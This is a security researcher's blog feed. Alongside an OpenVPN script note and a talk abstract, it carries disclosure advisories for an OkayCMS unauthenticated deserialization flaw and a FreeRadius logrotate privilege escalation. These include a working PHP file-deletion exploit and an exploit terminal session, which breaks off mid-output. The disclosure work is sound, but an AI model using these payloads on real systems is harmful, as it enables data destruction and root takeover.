Security https://tech.feedyourhead.at/ en OpenVPN: updating /etc/resolv.conf https://tech.feedyourhead.at/content/openvpn-updating-resolv.conf <span class="field field--name-title field--type-string field--label-hidden">OpenVPN: updating /etc/resolv.conf</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>OpenVPN comes with example-scripts to update <em>/etc/resolv.conf</em> using "resolvconf" or systemd-resolvconf. I don't use one of them therefore I <a href="https://github.com/whotwagner/update-resolv.conf.git">modified the script</a> so that it simply changes <em>/etc/resolv.conf </em>directly. I placed a variable "IMMUTEABLE" in this script. If IMMUTEABLE is set to 1, this script will change the fileattribute of /etc/resolv.conf to immuteable. In that way it is possible to prevent other programms like dhcp-clients to change /etc/resolv.conf while openvpn is running. I know, it's a little bit hacky, but it works for me. <a href="https://github.com/whotwagner/update-resolv.conf.git">The full source can be downloaded at github.com.</a></p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 26 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/tricks" hreflang="en">Tricks</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/bash" hreflang="en">Bash</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/openssl" hreflang="en">openssl</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/downloads" hreflang="en">Downloads</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=287&amp;2=comment&amp;3=comment" token="vHuPEwt9plgjYIf1hOZjt_5xBLAxtApjH9TdXBk7p8s"></drupal-render-placeholder> </section> Thu, 26 Dec 2019 16:45:26 +0000 Hoti 287 at https://tech.feedyourhead.at BSides 2019: Code diving for pop chains https://tech.feedyourhead.at/content/bsides2019-code-diving-for-pop-chains <span class="field field--name-title field--type-string field--label-hidden">BSides 2019: Code diving for pop chains</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="bsides vienna 2019 talk" data-entity-type="file" data-entity-uuid="f551b7b1-0611-4457-9ed1-c6af5193e0d8" height="691" src="/sites/default/files/inline-images/php_object_injection.jpg" width="1460" /></p> <p>I gave a talk at the <a href="https://bsidesvienna.at/">BSides 2019 Vienna</a> about PHP Object Injection. Here is the abstract of this talk:</p> <blockquote> <p>PHP Object Injection is a well known web vulnerability that could allow an attacker to perform different kinds of attacks by reusing and chaining existing code of the application(gadgets). Sometimes it is easier to find the vulnerability than discovering a proper chain for a remote code execution. This talk illustrates the long road of searching for various "POP chains" by disclosing details of a vulnerability for Okay-CMS. The code of the application will be analyzed and possible payloads will be discussed. A working unauthenticated remote code execution exploit will finally proof the concept.</p> </blockquote> <p>The slides can be downloaded here: <a href="/sites/default/files/DateiUploads/Code_Diving_for_Pop_Chains.pdf">Slides</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 11 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=285&amp;2=comment&amp;3=comment" token="2u7SucTKw6beg7-jglaabpQ2pYPLrK1hHgXNp7Lh618"></drupal-render-placeholder> </section> Wed, 11 Dec 2019 12:41:54 +0000 Hoti 285 at https://tech.feedyourhead.at OkayCMS: Unauthenticated remote code execution https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms <span class="field field--name-title field--type-string field--label-hidden">OkayCMS: Unauthenticated remote code execution</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>Identifier: AIT-SA-20191129-01<br /> Target: OkayCMS<br /> Vendor: OkayCMS<br /> Version: all versions including 2.3.4<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16885">CVE-2019-16885</a><br /> Accessibility: Local<br /> Severity: Critical<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://okay-cms.com/">OkayCMS is a simple and functional content managment system for an online store.</a></p> <h4>Vulnerability Description</h4> <p>An unauthenticated attacker can upload a webshell by injecting a malicious php-object via a crafted cookie. This could happen at two places. First in “<em>view/ProductsView.php</em>” using the cookie "price_filter" or in “<em>api/Comparison.php</em>” via the cookie "comparison". Both cookies will pass untrusted values to a unserialize()-function. The following code shows the vulnerability in “<em>api/Comparison.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$items</span> <span style="color: #339933;">=</span> <span style="color: #339933;">!</span><a href="http://www.php.net/empty"><span style="color: #990000;">empty</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> ? <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'comparison'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">:</span> <a href="http://www.php.net/array"><span style="color: #990000;">array</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <p>The unsafe deserialization also occurs in “<em>view/ProductsView.php</em>”:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000088;">$price_filter</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$_COOKIE</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'price_filter'</span><span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div> <h4>Proof of Concept</h4> <p>The following code utilizes an object of the smarty-component to delete arbitrary files from the webhost:</p> <div class="geshifilter"><pre class="php geshifilter-php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">&lt;?php</span> &nbsp; <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$argc</span> <span style="color: #339933;">!=</span> <span style="color: #cc66cc;">3</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <span style="color: #0000ff;">&quot;usage: <span style="color: #006699; font-weight: bold;">$argv[0]</span> &lt;url&gt; &lt;file&gt;<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/exit"><span style="color: #990000;">exit</span></a><span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$url</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$argv</span><span style="color: #009900;">&#91;</span><span style="color: #cc66cc;">2</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_CacheResource_File <span style="color: #009900;">&#123;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> releaseLock<span style="color: #009900;">&#40;</span>Smarty <span style="color: #000088;">$smarty</span><span style="color: #339933;">,</span> Smarty_Template_Cached <span style="color: #000088;">$cached</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">false</span><span style="color: #339933;">;</span> <span style="color: #339933;">@</span><a href="http://www.php.net/unlink"><span style="color: #990000;">unlink</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Template_Cached <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$handler</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$is_locked</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$lock_id</span> <span style="color: #339933;">=</span> <span style="color: #0000ff;">&quot;&quot;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">lock_id</span> <span style="color: #339933;">=</span> <span style="color: #000088;">$GLOBALS</span><span style="color: #009900;">&#91;</span><span style="color: #0000ff;">'file'</span><span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_CacheResource_File<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cache_locking</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">class</span> Smarty_Internal_Template <span style="color: #009900;">&#123;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$smarty</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000088;">$cached</span> <span style="color: #339933;">=</span> <span style="color: #009900; font-weight: bold;">null</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __construct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty<span style="color: #339933;">;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Template_Cached<span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">function</span> __destruct<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">if</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cache_locking</span> <span style="color: #339933;">&amp;&amp;</span> <a href="http://www.php.net/isset"><span style="color: #990000;">isset</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">&amp;&amp;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">is_locked</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">handler</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">releaseLock</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">smarty</span><span style="color: #339933;">,</span> <span style="color: #000088;">$this</span><span style="color: #339933;">-&gt;</span><span style="color: #004000;">cached</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> <span style="color: #009900;">&#125;</span> &nbsp; <span style="color: #000088;">$obj</span> <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Smarty_Internal_Template<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$serialized</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/serialize"><span style="color: #990000;">serialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$obj</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$un</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/unserialize"><span style="color: #990000;">unserialize</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$headers</span> <span style="color: #339933;">=</span> <span style="color: #009900;">&#91;</span> <span style="color: #0000ff;">'Accept-Language: en-US,en;q=0.5'</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">&quot;Referer: <span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki&quot;</span><span style="color: #339933;">,</span> <span style="color: #0000ff;">'Cookie: '</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">'price_filter='</span> <span style="color: #339933;">.</span> <a href="http://www.php.net/urlencode"><span style="color: #990000;">urlencode</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$serialized</span><span style="color: #009900;">&#41;</span> <span style="color: #339933;">.</span> <span style="color: #0000ff;">';'</span> <span style="color: #009900;">&#93;</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000088;">$curl</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_init"><span style="color: #990000;">curl_init</span></a><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <a href="http://www.php.net/curl_setopt_array"><span style="color: #990000;">curl_setopt_array</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #339933;">,</span> <span style="color: #009900;">&#91;</span> CURLOPT_HTTPHEADER <span style="color: #339933;">=&gt;</span> <span style="color: #000088;">$headers</span><span style="color: #339933;">,</span> CURLOPT_RETURNTRANSFER <span style="color: #339933;">=&gt;</span> <span style="color: #009900; font-weight: bold;">true</span><span style="color: #339933;">,</span> CURLOPT_URL <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">&quot;<span style="color: #006699; font-weight: bold;">$url</span>/en/catalog/myagkie-igrushki/sort-price&quot;</span><span style="color: #339933;">,</span> CURLOPT_USERAGENT <span style="color: #339933;">=&gt;</span> <span style="color: #0000ff;">'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'</span> <span style="color: #009900;">&#93;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #000088;">$resp</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_exec"><span style="color: #990000;">curl_exec</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.php.net/curl_close"><span style="color: #990000;">curl_close</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">print</span> <span style="color: #000088;">$resp</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <p>2019-08-29Contacting the vendor</p> <p>2019-09-04Vendor replied</p> <p>2019-09-17Vendor released commercial version 3.0.2 including a bugfix</p> <p>2019-09-29Public disclosure</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=284&amp;2=comment&amp;3=comment" token="GjVmaskhE-AMvP5dALObfK4_-KKa7f-L1OICRNPKZFg"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at FreeRadius: Privilege Escalation via Logrotate https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius <span class="field field--name-title field--type-string field--label-hidden">FreeRadius: Privilege Escalation via Logrotate</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h2>Identifier: AIT-SA-20191112-01</h2> <p>Target: FreeRadius<br /> Vendor: FreeRadius<br /> Version: all versions including 3.0.19<br /> Fixed in Version: 12.2.3, 12.1.8 and 12.0.8<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">CVE-2019-10143</a><br /> Accessibility: Local<br /> Severity: Low<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://freeradius.org/">FreeRadius is a modular Open-Source RADIUS suite.</a></p> <h4>Vulnerability Description</h4> <p>The ownership of the logdirectory “radacct” belongs to user "radiusd". User “radiusd” can elevate the privileges to “root” because of an unsafe interaction with logrotate.<br /> User “radiusd” owns the log directory /<em>var/log/radius/radacct:</em></p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; drwx------. <span style="color: #000000;">3</span> radiusd radiusd <span style="color: #000000;">4096</span> <span style="color: #000000;">26</span>. Apr <span style="color: #000000;">16</span>:01 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span> </pre></div> <p>Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the “su” directive:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/*/</span>detail <span style="color: #7a0874; font-weight: bold;">&#123;</span> monthly rotate <span style="color: #000000;">4</span> nocreate missingok compress <span style="color: #7a0874; font-weight: bold;">&#125;</span></pre></div></p> <p>Since logrotate is prone to a race-condition(see <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>) it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <p>Details of the race-condition in logrotate can be found at:</p> <ul> <li><a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></li> <li><a href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a></li> <li><a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></li> </ul> <h4>Proof of Concept</h4> <p>The following example illustrates how an attacker who already gained a shell as user “radiusd”, can elevate his privileges to “root”. After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate.&nbsp; If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner “radiusd”. As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener:</p> <p>&nbsp;</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">git clone</span> https:<span style="color: #000000; font-weight: bold;">//</span>github.com<span style="color: #000000; font-weight: bold;">/</span>whotwagner<span style="color: #000000; font-weight: bold;">/</span>logrotten.git <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten Cloning into <span style="color: #ff0000;">'/tmp/logrotten'</span>... remote: Enumerating objects: <span style="color: #000000;">84</span>, done. remote: Counting objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Compressing objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">58</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">58</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Total <span style="color: #000000;">84</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">35</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, reused <span style="color: #000000;">64</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">24</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, pack-reused <span style="color: #000000;">0</span> Unpacking objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> logrotten logrotten.c radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span> radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span> total <span style="color: #000000;">20</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">11144</span> Oct <span 